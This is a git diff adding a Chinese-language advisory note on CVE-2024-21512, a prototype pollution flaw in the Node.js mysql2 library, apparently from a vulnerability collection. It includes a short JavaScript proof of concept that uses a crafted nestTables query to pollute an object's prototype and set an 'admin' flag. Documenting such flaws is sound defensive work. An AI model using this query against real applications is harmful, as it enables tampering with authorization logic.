整理文件

2024-08-21 15:08:43 +08:00
parent fcad930af3
commit 299ba35f30
1043 changed files with 0 additions and 3 deletions
--- a/mysql2/mysql2原型污染漏洞(CVE-2024-21512).md
+++ b/mysql2/mysql2原型污染漏洞(CVE-2024-21512).md
@@ -0,0 +1,33 @@
+## mysql2原型污染漏洞(CVE-2024-21512)
+
+MySQL2 3.9.8 错误的版本中存在一个缺陷。该问题是由于使用 nestTables 时提交的字段和表用户输入清理不当而导致的实例污染。
+
+## poc
+
+```
+const mysql = require('mysql2');
+const connection = mysql.createConnection({
+host: '127.0.0.1',
+user: 'root',
+database: 'test',
+password: 'root',
+});
+
+let query_data = {
+sql: `SELECT CAST('{"admin":true}' AS JSON)_proto__;`,
+nestTables: "_",
+};
+
+connection.query(query_data, (err, results) => {
+
+if (err) throw err;
+console.log(Object.getPrototypeOf(results[0]));
+console.log(results[0].admin);
+});
+
+connection.end();
+```
+
+## 漏洞来源
+
+- https://security.snyk.io/vuln/SNYK-JS-MYSQL2-6861580